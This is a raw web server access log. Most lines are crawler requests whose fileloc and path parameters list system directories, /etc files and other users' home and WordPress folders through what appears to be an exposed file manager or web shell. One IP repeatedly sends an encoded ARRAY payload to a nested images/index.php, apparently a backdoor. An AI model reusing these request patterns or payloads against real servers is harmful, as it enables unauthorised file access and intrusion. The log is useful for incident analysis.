51.79.186.0 - - [19/May/2026:14:17:43 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303236332p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363636332q3538356636366631613936653635366566613438373939343563333633383738222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:14:19:46 +0100] "GET /?fileloc=%2F%2Fsbin%2Fxfs_admin&path=%2F%2Fsbin HTTP/2" 200 3416 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:19:49 +0100] "GET /?fileloc=%2F%2Fsbin%2Fpdns_server&path=%2F%2Fsbin HTTP/2" 200 1827518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:19:52 +0100] "GET /?fileloc=%2F%2Fsbin%2Fadduser&path=%2F%2Fsbin HTTP/2" 200 50933 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:19:55 +0100] "GET /?fileloc=%2F%2Fsbin%2Frpc.nfsd&path=%2F%2Fsbin HTTP/2" 200 15887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.110 - - [19/May/2026:14:19:56 +0100] "GET /collect/11459671640 HTTP/1.1" 200 27518 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:14:19:58 +0100] "GET /?fileloc=%2F%2Fsbin%2Fcracklib-packer&path=%2F%2Fsbin HTTP/2" 200 6136 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:20:01 +0100] "GET /?fileloc=%2F%2Fsbin%2Fnstat&path=%2F%2Fsbin HTTP/2" 200 12030 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:20:04 +0100] "GET /?fileloc=%2F%2Fsbin%2Fstart-stop-daemon&path=%2F%2Fsbin HTTP/2" 200 18404 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:14:18:05 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303238352p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363638352q6533623731666133303837383039363533343835353539666235373936346538222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:14:20:07 +0100] "GET /?path=%2F%2Fhome%2Fjsacsril HTTP/2" 200 2630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:20:10 +0100] "GET /?fileloc=%2F%2Fsbin%2Flgroupmod&path=%2F%2Fsbin HTTP/2" 200 8249 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:20:13 +0100] "GET /?path=%2F%2Fhome%2Fseatransinternat HTTP/2" 200 2633 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:20:16 +0100] "GET /?fileloc=%2F%2Fsbin%2Fdcb&path=%2F%2Fsbin HTTP/2" 200 34443 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:20:19 +0100] "GET /?fileloc=%2F%2Fsbin%2Ffsck.ext2&path=%2F%2Fsbin HTTP/2" 200 142781 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:20:22 +0100] "GET /?fileloc=%2F%2Fsbin%2Ffstrim&path=%2F%2Fsbin HTTP/2" 200 16008 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:20:25 +0100] "GET /?path=%2Fhome%2Fnasifict5 HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:14:18:27 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303330372p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363730372q3430646263313039386232313766356366666164366634353866373838373462222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:14:20:28 +0100] "GET /?fileloc=%2F%2Fsbin%2Fping&path=%2F%2Fsbin HTTP/2" 200 33319 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:20:31 +0100] "GET /?path=%2Fhome%2Flimaxmed HTTP/2" 200 2628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:20:34 +0100] "GET /?fileloc=%2F%2Fsbin%2Fifstat&path=%2F%2Fsbin HTTP/2" 200 18376 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.71.161 - - [19/May/2026:14:20:36 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-term-query.php?view/item/013090960008 HTTP/1.1" 200 27515 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:14:20:37 +0100] "GET /?fileloc=%2F%2Fsbin%2Fgetcap&path=%2F%2Fsbin HTTP/2" 200 6330 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:20:40 +0100] "GET /?fileloc=%2F%2Fsbin%2Fpam_console_apply&path=%2F%2Fsbin HTTP/2" 200 14690 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:20:43 +0100] "GET /?path=%2F%2Fhome%2Fyuushuusrilak HTTP/2" 200 2634 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:20:46 +0100] "GET /?path=%2F%2Fhome%2Frevdeptncgov HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:14:18:49 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303332392p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363732392q3130646466633463303136303131353235646134303637323637343335336666222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:14:20:49 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fssl HTTP/2" 200 3101 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:20:52 +0100] "GET /?fileloc=%2F%2Fsbin%2Favcstat&path=%2F%2Fsbin HTTP/2" 200 7585 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:20:55 +0100] "GET /?path=%2F%2Fhome%2Fkinoko HTTP/2" 200 2627 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.110 - - [19/May/2026:14:20:56 +0100] "GET /view/item/173585413821 HTTP/1.1" 200 27512 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:14:20:58 +0100] "GET /?path=%2F%2Fhome%2Fruraldeptncgov HTTP/2" 200 2630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:21:11 +0100] "GET /?path=%2F%2Fhome%2Fadgolk HTTP/2" 200 2628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:14:19:11 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303335312p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363735312q3762383631653934626563333363646533633634313330656531353231626633222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:14:21:13 +0100] "GET /?fileloc=%2F%2Fsbin%2Fmodinfo&path=%2F%2Fsbin HTTP/2" 200 71106 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:21:16 +0100] "GET /?path=%2Fhome%2Fsafetekg HTTP/2" 200 2628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.71.174 - - [19/May/2026:14:21:16 +0100] "GET /ta/treasury-circulars HTTP/1.1" 200 26233 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:14:21:19 +0100] "GET /?fileloc=%2F%2Fsbin%2Fcracklib-check&path=%2F%2Fsbin HTTP/2" 200 5785 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:21:22 +0100] "GET /?path=%2Fhome%2Fnusairict5 HTTP/2" 200 2630 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:21:25 +0100] "GET /?fileloc=%2F%2Fsbin%2Fgetpolicyload&path=%2F%2Fsbin HTTP/2" 200 5553 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:21:28 +0100] "GET /?fileloc=%2F%2Fsbin%2Fe2label&path=%2F%2Fsbin HTTP/2" 200 43844 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:21:31 +0100] "GET /?path=%2Fhome%2Fahastha3 HTTP/2" 200 2628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:14:19:33 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303337332p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363737332q3965313464396138396366643832366333653836633732626439663633386339222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:14:21:34 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2F.softaculous%2Ftmp HTTP/2" 200 2645 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:21:37 +0100] "GET /?fileloc=%2F%2Fsbin%2Fdepmod&path=%2F%2Fsbin HTTP/2" 200 71106 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.96 - - [19/May/2026:14:21:37 +0100] "GET /collect/112378868449 HTTP/1.1" 200 26621 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:14:21:40 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fuploads-old HTTP/2" 200 2940 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:21:43 +0100] "GET /?path=%2F%2Fhome%2Fcoopdeptncgov HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:21:46 +0100] "GET /?fileloc=%2F%2Fsbin%2Fimunify-notifier&path=%2F%2Fsbin HTTP/2" 200 3637121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:21:52 +0100] "GET /?fileloc=%2F%2Fetc%2Frelayhostsusers&path=%2F%2Fetc HTTP/2" 200 3449 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:14:19:55 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303339352p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363739352q3331353663656264356437626431326134343934383837303765396466656138222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
66.249.70.110 - - [19/May/2026:14:21:57 +0100] "GET /collect/121953194491 HTTP/1.1" 200 27260 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:14:21:58 +0100] "GET /?fileloc=%2F%2Fsbin%2Fip&path=%2F%2Fsbin HTTP/2" 200 307343 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:22:03 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fpomo HTTP/2" 200 3240 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:22:06 +0100] "GET /?fileloc=%2F%2Fsbin%2Fnfsidmap&path=%2F%2Fsbin HTTP/2" 200 9486 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:22:09 +0100] "GET /?fileloc=%2F%2Fsbin%2Feximstats&path=%2F%2Fsbin HTTP/2" 200 43524 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:22:12 +0100] "GET /?path=%2F%2Fhome%2Favasrilanka HTTP/2" 200 2632 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:22:15 +0100] "GET /?fileloc=%2F%2Fsbin%2Fnft&path=%2F%2Fsbin HTTP/2" 200 10139 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:14:20:17 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303431372p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363831372q6661353832303366663065353731333238383661393037386639353366626336222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
66.249.70.96 - - [19/May/2026:14:22:17 +0100] "GET /view/item/17746363344 HTTP/1.1" 200 26781 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:14:22:18 +0100] "GET /?fileloc=%2F%2Fsbin%2Fexim&path=%2F%2Fsbin HTTP/2" 200 664451 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:22:21 +0100] "GET /?fileloc=%2F%2Fsbin%2Fload_policy&path=%2F%2Fsbin HTTP/2" 200 6090 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:22:24 +0100] "GET /?fileloc=%2F%2Fsbin%2Flid&path=%2F%2Fsbin HTTP/2" 200 7393 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:22:27 +0100] "GET /?fileloc=%2F%2Fetc%2Fnamed.root.key&path=%2F%2Fetc HTTP/2" 200 2951 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:22:30 +0100] "GET /?path=%2F%2Fhome%2Flksricom HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:22:33 +0100] "GET /?path=%2Fhome%2Ffortisi1 HTTP/2" 200 2628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:22:36 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FPHPMailer HTTP/2" 200 3271 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.110 - - [19/May/2026:14:22:38 +0100] "GET /?login?logged_out=1 HTTP/1.1" 200 26265 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:14:22:39 +0100] "GET /?fileloc=%2F%2Fetc%2Fsystem-release&path=%2F%2Fetc HTTP/2" 200 2595 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:14:20:40 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303434302p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363834302q6230383237373831343161306637303366343561376630363566373361633835222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:14:22:42 +0100] "GET /?path=%2F%2Fhome%2Fvibhawap HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:22:45 +0100] "GET /?fileloc=%2F%2Flib%2Fsendmail&path=%2F%2Flib HTTP/2" 200 6726 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:22:49 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin%2Fexport.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin HTTP/2" 200 5870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:22:51 +0100] "GET /?fileloc=%2F%2Fsbin%2Fplipconfig&path=%2F%2Fsbin HTTP/2" 200 6313 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:22:54 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-wp-embed.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 7415 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:22:57 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fcache-compat.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 3957 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:23:00 +0100] "GET /?fileloc=%2F%2Fetc%2Ffuse.conf&path=%2F%2Fetc HTTP/2" 200 2595 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.110 - - [19/May/2026:14:22:59 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-theme.php?view/item/112492455103 HTTP/1.1" 200 27369 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.186.0 - - [19/May/2026:14:21:02 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230303436322p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393139363836322q6265303264336634386134666538363736323531646663346561653630636630222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:14:23:03 +0100] "GET /?fileloc=%2F%2Fetc%2Fuserplans&path=%2F%2Fetc HTTP/2" 200 2566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:23:06 +0100] "GET /?path=%2Fhome%2Fhillsunu HTTP/2" 200 2628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:23:09 +0100] "GET /?fileloc=%2F%2Fsbin%2Frtacct&path=%2F%2Fsbin HTTP/2" 200 10886 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:23:12 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fdefault-widgets.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 3049 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:23:15 +0100] "GET /?fileloc=%2F%2Fetc%2Fvconsole.conf&path=%2F%2Fetc HTTP/2" 200 2603 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:23:18 +0100] "GET /?fileloc=%2F%2Fetc%2Fagent360.ini&path=%2F%2Fetc HTTP/2" 200 2570 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:14:23:21 +0100] "GET /?path=%2F%2Fhome%2Fneurahos HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.71.174 - - [19/May/2026:14:23:21 +0100] "GET /view/item/122051147740 HTTP/1.1" 200 27153 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:14:23:24 +0100] "GET /?fileloc=%2F%2Fsbin%2Fnameif&path=%2F%2Fsbin HTTP/2" 200 7949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
